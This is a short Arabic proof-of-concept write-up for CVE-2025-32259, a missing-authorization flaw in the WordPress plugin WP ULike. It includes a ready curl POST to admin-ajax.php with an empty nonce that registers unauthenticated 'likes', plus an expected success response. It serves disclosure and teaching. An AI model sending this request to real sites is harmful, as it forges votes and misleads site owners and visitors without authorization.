
في الإصدارات المتأثرة من إضافة WP ULike، لا يوجد فحص تفويض مناسب قبل السماح ببعض إجراءات AJAX أو عمليات التلاعب بالتصويت. وهذا يسمح للمستخدمين غير المصادَق عليهم بالتفاعل مع الإضافة بطرق لا يُسمح بها إلا للمستخدمين المسجّلين — مما قد يؤدي إلى تحريف الأصوات أو إدخال بيانات مضللة.
🔬 PoC بسيط يوضح ثغرة CVE-2025-32259 في إضافة WP ULike لـ WordPress.
🚨 للاستخدام التعليمي فقط – لا تختبر على الأنظمة دون إذن صريح.
WP ULike هي إضافة شائعة لـ WordPress تتيح للمستخدمين الإعجاب بالمحتوى على الموقع. تعاني الإصدارات حتى 4.7.9.1 من ثغرة نقص التفويض، مما يسمح للمستخدمين غير المصادَق عليهم بانتحال إجراءات "الإعجاب" عبر طلبات AJAX.
تسمح الثغرة للمستخدمين غير المصادَق عليهم بالتفاعل مع نقطة نهاية AJAX والإعجاب بأي محتوى (منشور، تعليق، إلخ) دون إذن.
curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
-d "action=wp_ulike_process" \
-d "method=likeThis" \
-d "id=1" \
-d "type=post" \
-d "nonce=" \
-H "Content-Type: application/x-www-form-urlencoded"
استبدل id=1 بمعرّف منشور صالح.
قد يبدو الرد الناجح كما يلي: {"status":"success","msg":"You liked this."}